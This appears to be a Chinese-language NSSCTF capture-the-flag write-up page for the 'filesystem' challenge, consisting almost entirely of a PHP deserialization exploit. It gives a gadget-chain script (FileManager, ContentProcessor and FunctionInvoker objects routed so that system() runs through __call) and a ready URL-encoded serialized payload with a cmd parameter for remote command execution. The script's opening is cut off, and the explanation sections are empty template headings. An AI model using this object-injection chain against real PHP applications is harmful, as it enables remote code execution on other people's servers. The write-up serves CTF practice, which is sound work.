文章 - exp | NSSCTF

Problem: [NSSCTF 4th][mpga]filesystem

思路

解题大致思路

processedContent=$a; $this->callbackFunction=$b; } } class FileManager{ public $targetFile; public $responseData = 'default_response'; function __construct($ta){ $this->targetFile=$ta; } } class FunctionInvoker{ public $functionName; public $functionArguments; public function __call($name, $arg){ if (function_exists($name)) { $name($arg[0]); } } } $a=new FunctionInvoker(); $b=new ContentProcessor($a,'system'); $fi1=new FileManager($b); #这里的嵌套，内层用于ContentProcessor $fi2=new FileManager($fi1); #这里的外层，用于触发tostring echo serialize($fi2); echo "\n"; echo "\n"; echo "\n"; echo urlencode(serialize($fi2)); ?>

EXP

具体攻击代码
file_to_check=O%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A16%3A%22ContentProcessor%22%3A2%3A%7Bs%3A34%3A%22%00ContentProcessor%00processedContent%22%3BO%3A15%3A%22FunctionInvoker%22%3A2%3A%7Bs%3A12%3A%22functionName%22%3BN%3Bs%3A17%3A%22functionArguments%22%3BN%3B%7Ds%3A16%3A%22callbackFunction%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7D&submit_md5=&method=performWriteOperation&var=processedContent&cmd=ls

总结

对该题的考点总结